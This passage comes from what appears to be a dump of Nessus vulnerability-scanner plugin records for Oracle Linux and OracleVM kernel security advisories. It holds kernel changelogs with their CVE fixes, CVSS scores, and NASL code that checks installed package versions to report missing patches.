!~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-61.1.33.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-firmware-4.1.12-61.1.33.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:57", "description": "Description of changes:\n\n[4.1.12-61.1.33.el7uek]\n- Revert 'x86/mm: Expand the exception table logic to allow new handling \noptions' (Brian Maly) [Orabug: 25790387] {CVE-2016-9644}\n- Revert 'fix minor infoleak in get_user_ex()' (Brian Maly) [Orabug: \n25790387] {CVE-2016-9644}\n\n[4.1.12-61.1.32.el7uek]\n- x86/mm: Expand the exception table logic to allow new handling options \n(Tony Luck) [Orabug: 25790387] {CVE-2016-9644}\n\n[4.1.12-61.1.31.el7uek]\n- rebuild bumping release\n\n[4.1.12-61.1.30.el7uek]\n- net: ping: check minimum size on ICMP header length (Kees Cook) \n[Orabug: 25766898] {CVE-2016-8399} {CVE-2016-8399}\n- sg_write()/bsg_write() is not fit to be called under KERNEL_DS (Al \nViro) [Orabug: 25765436] {CVE-2016-10088}\n- scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter chang) \n[Orabug: 25751984] {CVE-2017-7187}\n\n[4.1.12-61.1.29.el7uek]\n- tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander Popov) [Orabug: \n25696677] {CVE-2017-2636}\n- TTY: n_hdlc, fix lockdep false positive (Jiri Slaby) [Orabug: \n25696677] {CVE-2017-2636}\n- If Slot Status indicates changes in both Data Link Layer Status and \nPresence Detect, prioritize the Link status change. (Jack Vogel) \n[Orabug: 25353783]\n- PCI: pciehp: Leave power indicator on when enabling already-enabled \nslot (Ashok Raj) [Orabug: 25353783]\n- firewire: net: guard against rx buffer overflows (Stefan Richter) \n[Orabug: 25451520] {CVE-2016-8633}\n- usbnet: cleanup after bind() in probe() (Oliver Neukum) [Orabug: \n25463898] {CVE-2016-3951}\n- cdc_ncm: do not call usbnet_link_change from cdc_ncm_bind (Bjø rn Mork) \n [Orabug: 25463898] {CVE-2016-3951}\n- cdc_ncm: Add support for moving NDP to end of NCM frame (Enrico Mioso) \n [Orabug: 25463898] {CVE-2016-3951}\n- x86/mm/32: Enable full randomization on i386 and X86_32 (Hector \nMarco-Gisbert) [Orabug: 25463918] {CVE-2016-3672}\n- kvm: fix page struct leak in handle_vmon (Paolo Bonzini) [Orabug: \n25507133] {CVE-2017-2596}\n- crypto: mcryptd - Check mcryptd algorithm compatibility (tim) \n[Orabug: 25507153] {CVE-2016-10147}\n- kvm: nVMX: Allow L1 to intercept software exceptions (#BP and #OF) \n(Jim Mattson) [Orabug: 25507188] {CVE-2016-9588}\n- KVM: x86: drop error recovery in em_jmp_far and em_ret_far (Radim \nKrč má ř ) [Orabug: 25507213] {CVE-2016-9756}\n- tcp: take care of truncations done by sk_filter() (Eric Dumazet) \n[Orabug: 25507226] {CVE-2016-8645}\n- rose: limit sk_filter trim to payload (Willem de Bruijn) [Orabug: \n25507226] {CVE-2016-8645}\n- tipc: check minimum bearer MTU (Michal Kubeč ek) [Orabug: 25507239] \n{CVE-2016-8632} {CVE-2016-8632}\n- fix minor infoleak in get_user_ex() (Al Viro) [Orabug: 25507269] \n{CVE-2016-9178}\n- scsi: arcmsr: Simplify user_len checking (Borislav Petkov) [Orabug: \n25507319] {CVE-2016-7425}\n- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() (Dan \nCarpenter) [Orabug: 25507319] {CVE-2016-7425}\n- tmpfs: clear S_ISGID when setting posix ACLs (Gu Zheng) [Orabug: \n25507341] {CVE-2016-7097} {CVE-2016-7097}\n- posix_acl: Clear SGID bit when setting file permissions (Jan Kara) \n[Orabug: 25507341] {CVE-2016-7097} {CVE-2016-7097}\n- ext2: convert to mbcache2 (Jan Kara) [Orabug: 25512366] {CVE-2015-8952}\n- ext4: convert to mbcache2 (Jan Kara) [Orabug: 25512366] {CVE-2015-8952}\n- mbcache2: reimplement mbcache (Jan Kara) [Orabug: 25512366] \n{CVE-2015-8952}\n- USB: digi_acceleport: do sanity checking for the number of ports \n(Oliver Neukum) [Orabug: 25512466] {CVE-2016-3140}\n- net/llc: avoid BUG_ON() in skb_orphan() (Eric Dumazet) [Orabug: \n25682419] {CVE-2017-6345}\n- net/mlx4_core: Disallow creation of RAW QPs on a VF (Eli Cohen) \n[Orabug: 25697847]\n- ipv4: keep skb->dst around in presence of IP options (Eric Dumazet) \n[Orabug: 25698300] {CVE-2017-5970}\n- perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race \n(Peter Zijlstra) [Orabug: 25698751] {CVE-2017-6001}\n- ip6_gre: fix ip6gre_err() invalid reads (Eric Dumazet) [Orabug: \n25699015] {CVE-2017-5897}\n- mpt3sas: Don't spam logs if logging level is 0 (Johannes Thumshirn) \n[Orabug: 25699035]\n- xen-netfront: cast grant table reference first to type int (Dongli \nZhang)\n- xen-netfront: do not cast grant table reference to signed short \n(Dongli Zhang)", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-03T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3533)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7097", "CVE-2016-8633", "CVE-2016-8399", "CVE-2016-10088", "CVE-2017-6001", "CVE-2017-5970", "CVE-2015-8952", "CVE-2017-2636", "CVE-2016-8632", "CVE-2016-9178", "CVE-2016-7425", "CVE-2016-3951", "CVE-2016-10147", "CVE-2016-9756", "CVE-2017-6345", "CVE-2017-2596", "CVE-2016-9588", "CVE-2016-3140", "CVE-2017-7187", "CVE-2016-9644", "CVE-2016-3672", "CVE-2016-8645", "CVE-2017-5897"], "modified": "2017-04-03T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.33.el6uek", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.33.el7uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2017-3533.NASL", "href": "https://www.tenable.com/plugins/nessus/99159", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3533.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99159);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-8952\", \"CVE-2016-10088\", \"CVE-2016-10147\", \"CVE-2016-3140\", \"CVE-2016-3672\", \"CVE-2016-3951\", \"CVE-2016-7097\", \"CVE-2016-7425\", \"CVE-2016-8399\", \"CVE-2016-8632\", \"CVE-2016-8633\", \"CVE-2016-8645\", \"CVE-2016-9178\", \"CVE-2016-9588\", \"CVE-2016-9644\", \"CVE-2016-9756\", \"CVE-2017-2596\", \"CVE-2017-2636\", \"CVE-2017-5897\", \"CVE-2017-5970\", \"CVE-2017-6001\", \"CVE-2017-6345\", \"CVE-2017-7187\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3533)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[4.1.12-61.1.33.el7uek]\n- Revert 'x86/mm: Expand the exception table logic to allow new handling \noptions' (Brian Maly) [Orabug: 25790387] {CVE-2016-9644}\n- Revert 'fix minor infoleak in get_user_ex()' (Brian Maly) [Orabug: \n25790387] {CVE-2016-9644}\n\n[4.1.12-61.1.32.el7uek]\n- x86/mm: Expand the exception table logic to allow new handling options \n(Tony Luck) [Orabug: 25790387] {CVE-2016-9644}\n\n[4.1.12-61.1.31.el7uek]\n- rebuild bumping release\n\n[4.1.12-61.1.30.el7uek]\n- net: ping: check minimum size on ICMP header length (Kees Cook) \n[Orabug: 25766898] {CVE-2016-8399} {CVE-2016-8399}\n- sg_write()/bsg_write() is not fit to be called under KERNEL_DS (Al \nViro) [Orabug: 25765436] {CVE-2016-10088}\n- scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter chang) \n[Orabug: 25751984] {CVE-2017-7187}\n\n[4.1.12-61.1.29.el7uek]\n- tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander Popov) [Orabug: \n25696677] {CVE-2017-2636}\n- TTY: n_hdlc, fix lockdep false positive (Jiri Slaby) [Orabug: \n25696677] {CVE-2017-2636}\n- If Slot Status indicates changes in both Data Link Layer Status and \nPresence Detect, prioritize the Link status change. (Jack Vogel) \n[Orabug: 25353783]\n- PCI: pciehp: Leave power indicator on when enabling already-enabled \nslot (Ashok Raj) [Orabug: 25353783]\n- firewire: net: guard against rx buffer overflows (Stefan Richter) \n[Orabug: 25451520] {CVE-2016-8633}\n- usbnet: cleanup after bind() in probe() (Oliver Neukum) [Orabug: \n25463898] {CVE-2016-3951}\n- cdc_ncm: do not call usbnet_link_change from cdc_ncm_bind (Bjø rn Mork) \n [Orabug: 25463898] {CVE-2016-3951}\n- cdc_ncm: Add support for moving NDP to end of NCM frame (Enrico Mioso) \n [Orabug: 25463898] {CVE-2016-3951}\n- x86/mm/32: Enable full randomization on i386 and X86_32 (Hector \nMarco-Gisbert) [Orabug: 25463918] {CVE-2016-3672}\n- kvm: fix page struct leak in handle_vmon (Paolo Bonzini) [Orabug: \n25507133] {CVE-2017-2596}\n- crypto: mcryptd - Check mcryptd algorithm compatibility (tim) \n[Orabug: 25507153] {CVE-2016-10147}\n- kvm: nVMX: Allow L1 to intercept software exceptions (#BP and #OF) \n(Jim Mattson) [Orabug: 25507188] {CVE-2016-9588}\n- KVM: x86: drop error recovery in em_jmp_far and em_ret_far (Radim \nKrč má ř ) [Orabug: 25507213] {CVE-2016-9756}\n- tcp: take care of truncations done by sk_filter() (Eric Dumazet) \n[Orabug: 25507226] {CVE-2016-8645}\n- rose: limit sk_filter trim to payload (Willem de Bruijn) [Orabug: \n25507226] {CVE-2016-8645}\n- tipc: check minimum bearer MTU (Michal Kubeč ek) [Orabug: 25507239] \n{CVE-2016-8632} {CVE-2016-8632}\n- fix minor infoleak in get_user_ex() (Al Viro) [Orabug: 25507269] \n{CVE-2016-9178}\n- scsi: arcmsr: Simplify user_len checking (Borislav Petkov) [Orabug: \n25507319] {CVE-2016-7425}\n- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() (Dan \nCarpenter) [Orabug: 25507319] {CVE-2016-7425}\n- tmpfs: clear S_ISGID when setting posix ACLs (Gu Zheng) [Orabug: \n25507341] {CVE-2016-7097} {CVE-2016-7097}\n- posix_acl: Clear SGID bit when setting file permissions (Jan Kara) \n[Orabug: 25507341] {CVE-2016-7097} {CVE-2016-7097}\n- ext2: convert to mbcache2 (Jan Kara) [Orabug: 25512366] {CVE-2015-8952}\n- ext4: convert to mbcache2 (Jan Kara) [Orabug: 25512366] {CVE-2015-8952}\n- mbcache2: reimplement mbcache (Jan Kara) [Orabug: 25512366] \n{CVE-2015-8952}\n- USB: digi_acceleport: do sanity checking for the number of ports \n(Oliver Neukum) [Orabug: 25512466] {CVE-2016-3140}\n- net/llc: avoid BUG_ON() in skb_orphan() (Eric Dumazet) [Orabug: \n25682419] {CVE-2017-6345}\n- net/mlx4_core: Disallow creation of RAW QPs on a VF (Eli Cohen) \n[Orabug: 25697847]\n- ipv4: keep skb->dst around in presence of IP options (Eric Dumazet) \n[Orabug: 25698300] {CVE-2017-5970}\n- perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race \n(Peter Zijlstra) [Orabug: 25698751] {CVE-2017-6001}\n- ip6_gre: fix ip6gre_err() invalid reads (Eric Dumazet) [Orabug: \n25699015] {CVE-2017-5897}\n- mpt3sas: Don't spam logs if logging level is 0 (Johannes Thumshirn) \n[Orabug: 25699035]\n- xen-netfront: cast grant table reference first to type int (Dongli \nZhang)\n- xen-netfront: do not cast grant table reference to signed short \n(Dongli Zhang)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-April/006815.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-April/006816.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.33.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.33.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-8952\", \"CVE-2016-10088\", \"CVE-2016-10147\", \"CVE-2016-3140\", \"CVE-2016-3672\", \"CVE-2016-3951\", \"CVE-2016-7097\", \"CVE-2016-7425\", \"CVE-2016-8399\", \"CVE-2016-8632\", \"CVE-2016-8633\", \"CVE-2016-8645\", \"CVE-2016-9178\", \"CVE-2016-9588\", \"CVE-2016-9644\", \"CVE-2016-9756\", \"CVE-2017-2596\", \"CVE-2017-2636\", \"CVE-2017-5897\", \"CVE-2017-5970\", \"CVE-2017-6001\", \"CVE-2017-6345\", \"CVE-2017-7187\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3533\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"4.1\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-4.1.12-61.1.33.el6uek-0.5.3-2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-61.1.33.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-61.1.33.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-61.1.33.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-61.1.33.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-61.1.33.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-61.1.33.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-4.1.12-61.1.33.el7uek-0.5.3-2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-61.1.33.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-61.1.33.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-61.1.33.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-61.1.33.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-61.1.33.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-61.1.33.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:24:11", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - nfsd: stricter decoding of write-like NFSv2/v3 ops (J.\n Bruce Fields) [Orabug: 25986995] (CVE-2017-7895)\n\n - ocfs2/o2net: o2net_listen_data_ready should do nothing\n if socket state is not TCP_LISTEN (Tariq Saeed) [Orabug:\n 25510857]\n\n - IB/CORE: sync the resouce access in fmr_pool (Wengang\n Wang) [Orabug: 23750748]\n\n - ipv6: Skip XFRM lookup if dst_entry in socket cache is\n valid (Jakub Sitnicki) [Orabug: 25534688]\n\n - uek-rpm: enable CONFIG_KSPLICE. (Jamie Iles) [Orabug:\n 25549845]\n\n - ksplice: add sysctls for determining Ksplice features.\n (Jamie Iles) \n\n - signal: protect SIGNAL_UNKILLABLE from unintentional\n clearing. (Jamie Iles) [Orabug: 25549845]\n\n - KVM: x86: fix emulation of 'MOV SS, null selector'\n (Paolo Bonzini) [Orabug: 25719676] (CVE-2017-2583)\n (CVE-2017-2583)\n\n - sctp: avoid BUG_ON on sctp_wait_for_sndbuf (Marcelo\n Ricardo Leitner) [Orabug: 25719811] (CVE-2017-5986)\n\n - tcp: avoid infinite loop in tcp_splice_read (Eric\n Dumazet) [Orabug: 25720815] (CVE-2017-6214)\n\n - USB: visor: fix null-deref at probe (Johan Hovold)\n [Orabug: 25796604] (CVE-2016-2782)\n\n - ipc/shm: Fix shmat mmap nil-page protection (Davidlohr\n Bueso) [Orabug: 25797014] (CVE-2017-5669)\n\n - vhost: actually track log eventfd file\n (Marc-André Lureau) [Orabug: 25797056]\n (CVE-2015-6252)\n\n - xfrm_user: validate XFRM_MSG_NEWAE incoming ESN size\n harder (Andy Whitcroft) [Orabug: 25814664]\n (CVE-2017-7184)\n\n - xfrm_user: validate XFRM_MSG_NEWAE XFRMA_REPLAY_ESN_VAL\n replay_window (Andy Whitcroft) [Orabug: 25814664]\n (CVE-2017-7184)\n\n - KEYS: Remove key_type::match in favour of overriding\n default by match_preparse (David Howells) [Orabug:\n 25823965] (CVE-2017-2647) (CVE-2017-2647)\n\n - USB: whiteheat: fix potential null-deref at probe (Johan\n Hovold) [Orabug: 25825107] (CVE-2015-5257)\n\n - RDS: fix race condition when sending a message on\n unbound socket (Quentin Casasnovas) [Orabug: 25871048]\n (CVE-2015-6937) (CVE-2015-6937)\n\n - udf: Check path length when reading symlink (Jan Kara)\n [Orabug: 25871104] (CVE-2015-9731)\n\n - udf: Treat symlink component of type 2 as / (Jan Kara)\n [Orabug: 25871104] (CVE-2015-9731)\n\n - udp: properly support MSG_PEEK with truncated buffers\n (Eric Dumazet) [Orabug: 25874741] (CVE-2016-10229)\n\n - block: fix use-after-free in seq file (Vegard Nossum)\n [Orabug: 25877531] (CVE-2016-7910)\n\n - RHEL: complement upstream workaround for CVE-2016-10142.\n (Quentin Casasnovas) [Orabug: 25765786] (CVE-2016-10142)\n (CVE-2016-10142)\n\n - net: ping: check minimum size on ICMP header length\n (Kees Cook) [Orabug: 25766914] (CVE-2016-8399)\n\n - ipv6: stop sending PTB packets for MTU < 1280 (Hagen\n Paul Pfeifer) [Orabug: 25765786] (CVE-2016-10142)\n\n - sg_write/bsg_write is not fit to be called under\n KERNEL_DS (Al Viro) [Orabug: 25765448] (CVE-2016-10088)\n\n - scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter\n chang) [Orabug: 25752011] (CVE-2017-7187)\n\n - tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander\n Popov) [Orabug: 25696689] (CVE-2017-2636)\n\n - TTY: n_hdlc, fix lockdep false positive (Jiri Slaby)\n [Orabug: 25696689] (CVE-2017-2636)\n\n - drivers/tty/n_hdlc.c: replace kmalloc/memset by kzalloc\n (Fabian Frederick) [Orabug: 25696689] (CVE-2017-2636)\n\n - list: introduce list_first_entry_or_null (Jiri Pirko)\n [Orabug: 25696689] (CVE-2017-2636)\n\n - firewire: net: guard against rx buffer overflows (Stefan\n Richter) [Orabug: 25451538] (CVE-2016-8633)\n\n - x86/mm/32: Enable full randomization on i386 and X86_32\n (Hector Marco-Gisbert) [Orabug: 25463929]\n (CVE-2016-3672)\n\n - x86 get_unmapped_area: Access mmap_legacy_base through\n mm_struct member (Radu Caragea) [Orabug: 25463929]\n (CVE-2016-3672)\n\n - sg_start_req: make sure that there's not too many\n elements in iovec (Al Viro) [Orabug: 25490377]\n (CVE-2015-5707)\n\n - tcp: take care of truncations done by sk_filter (Eric\n Dumazet) [Orabug: 25507232] (CVE-2016-8645)\n\n - rose: limit sk_filter trim to payload (Willem de Bruijn)\n [Orabug: 25507232] (CVE-2016-8645)\n\n - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer\n (Dan Carpenter) [Orabug: 25507330] (CVE-2016-7425)\n\n - x86: bpf_jit: fix compilation of large bpf programs\n (Alexei Starovoitov) [Orabug: 25507375] (CVE-2015-4700)\n\n - net: fix a kernel infoleak in x25 module (Kangjie Lu)\n [Orabug: 25512417] (CVE-2016-4580)\n\n - USB: digi_acceleport: do sanity checking for the number\n of ports (Oliver Neukum) [Orabug: 25512472]\n (CVE-2016-3140)\n\n - net/llc: avoid BUG_ON in skb_orphan (Eric Dumazet)\n [Orabug: 25682437] (CVE-2017-6345)\n\n - dccp: fix freeing skb too early for IPV6_RECVPKTINFO\n (Andrey Konovalov) [Orabug: 25598277] (CVE-2017-6074)\n\n - vfs: read file_handle only once in handle_to_path (Sasha\n Levin) [Orabug: 25388709] (CVE-2015-1420)\n\n - crypto: algif_hash - Only export and import on sockets\n with data (Herbert Xu) [Orabug: 25417807]\n\n - USB: usbfs: fix potential infoleak in devio (Kangjie Lu)\n [Orabug: 25462763] (CVE-2016-4482)\n\n - net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462811]\n (CVE-2016-4485)\n\n - af_unix: Guard against other == sk in unix_dgram_sendmsg\n (Rainer Weikusat) [Orabug: 25464000] (CVE-2013-7446)\n\n - unix: avoid use-after-free in ep_remove_wait_queue\n (Rainer Weikusat) [Orabug: 25464000] (CVE-2013-7446)", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-17T00:00:00", "title": "OracleVM 3.2 : Unbreakable / etc (OVMSA-2017-0106)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2782", "CVE-2017-7895", "CVE-2017-7184", "CVE-2016-7910", "CVE-2016-8633", "CVE-2017-6074", "CVE-2016-8399", "CVE-2015-1420", "CVE-2016-10088", "CVE-2015-6252", "CVE-2015-9731", "CVE-2015-5257", "CVE-2017-2636", "CVE-2017-2583", "CVE-2016-7425", "CVE-2017-6214", "CVE-2016-4485", "CVE-2016-4482", "CVE-2017-6345", "CVE-2017-5669", "CVE-2017-2647", "CVE-2017-5986", "CVE-2016-3140", "CVE-2016-10229", "CVE-2013-7446", "CVE-2017-7187", "CVE-2016-10142", "CVE-2015-5707", "CVE-2016-4580", "CVE-2016-3672", "CVE-2016-8645", "CVE-2015-6937", "CVE-2015-4700"], "modified": "2017-05-17T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:kernel-uek", "cpe:/o:oracle:vm_server:3.2", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": "ORACLEVM_OVMSA-2017-0106.NASL", "href": "https://www.tenable.com/plugins/nessus/100238", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, 